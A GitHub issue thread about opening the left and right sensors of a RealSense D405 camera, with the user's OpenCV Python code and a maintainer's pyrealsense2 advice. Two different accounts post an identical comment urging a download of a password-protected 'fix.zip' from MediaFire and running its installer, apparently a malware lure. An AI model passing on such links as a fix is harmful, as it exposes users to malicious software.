realsenseai/librealsense #13291: The left and right cameras of the binocular camera cannot be opened

kay2019-art, 2024-08-26:
I used the following python code to try to open the binocular camera, the actual effect of opening only opened the right camera, and then the camera data is cut into two parts, I do not know the reason, please analyze it, or there is a similar code for reference, thank you! Python code was written by a reference to CSDN bilateral Lord, he can normal open, I can only open the right side of the camera, link is as follows: https://blog.csdn.net/qq_41204464/article/details/113090604# -*- coding: utf-8 -*-

import cv2
import time
 
 
AUTO = False 
INTERVAL = 2 
 
cv2.namedWindow("left")
cv2.namedWindow("right")
camera = cv2.VideoCapture(0)
 

camera.set(cv2.CAP_PROP_FRAME_WIDTH,1280)
camera.set(cv2.CAP_PROP_FRAME_HEIGHT,480)
 
counter = 0
utc = time.time()
folder = "./SaveImage/" 
 
def shot(pos, frame):
    global counter
    path = folder + pos + "_" + str(counter) + ".jpg"
 
    cv2.imwrite(path, frame)
    print("snapshot saved into: " + path)
 
while True:
    ret, frame = camera.read()
   
    left_frame = frame[0:480, 0:640]
    right_frame = frame[0:480, 640:1280]
 
    cv2.imshow("left", left_frame)
    cv2.imshow("right", right_frame)
 
    now = time.time()
    if AUTO and now - utc >= INTERVAL:
        shot("left", left_frame)
        shot("right", right_frame)
        counter += 1
        utc = now
 
    key = cv2.waitKey(1)
    if key == ord("q"):
        break
    elif key == ord("s"):
        shot("left", left_frame)
        shot("right", right_frame)
        counter += 1
camera.release()
cv2.destroyWindow("left")
cv2.destroyWindow("right")

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

MartyG-RealSense, 2024-08-26:
Hi @kay2019-art  Once the Python compatibility wrapper **pyrealsense2** has been installed, you can access both the left and right infrared sensors with the code below.

```
import pyrealsense2 as rs

pipeline = rs.pipeline()
ctx = rs.context()
device = ctx.devices[0]
config = rs.config()

config.enable_stream(rs.stream.infrared, 1, 1280,720, rs.format.y8, 6)
config.enable_stream(rs.stream.infrared, 2, 1280,720, rs.format.y8, 6)

profile = pipeline.start(config)
```

kay2019-art, 2024-08-26:
@MartyG-RealSense Both usb2 and usb3 can only open the right camera. Can you provide the complete code for opening the left and right cameras using pyrealsense2 package? Here, only the pyrealsense2 package can be detected

MartyG-RealSense, 2024-08-26:
On a USB 3 connection the above code does access both left and right cameras, by assigning an index number to each sensor (1 for the left sensor and 2 for the right sensor).

If you are able to access the right IR camera then this would indicate that you are on a USB 3 connection.  However, it is important to remember that it is left and right viewed from a position behind the camera facing forwards.  Because of this, when looking at the front of the camera the left sensor is on the **right** side of the camera.

[image]

kay2019-art, 2024-08-26:
@Wanderx13 What packages do I need to download and what problems can I solve

kay2019-art, 2024-08-26:
@MartyG-RealSense My camera model is 405, without infrared function. I understand the logic of left and right cameras you said, but I can only open one camera in any operation. May I ask how to obtain the id of left and right cameras for opencv to call

MartyG-RealSense, 2024-08-26:
D405 cameras do have left and right infrared sensors.  There are rare cases on Windows computers when the infrared streams are not accessible because of damaged camera drivers, which is fixed by removing and re-installing the drivers.  

A situation on D405 where only the left infrared stream is available on a USB 3 connection is if the left stream's format is set to RGB8 or BGR8 instead of Y8.

In RealSense programs with OpenCV code where the RealSense image is converted into an OpenCV image, only one of the infrared streams is usually used.  It may not be necessary to use both streams, since they will look almost the same except for one's view being slightly offset horizontally from the other's view due to the IR sensors' positions on the front of the camera.

There is not a pyrealsense2 example of using both left and right IR sensors with OpenCV, though there is a C++ OpenCV example script using both sensors at https://github.com/IntelRealSense/librealsense/issues/1480 that you might be able to use as a reference for attempting to convert it to Python code.

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

closed 2025-01-06 by MartyG-RealSense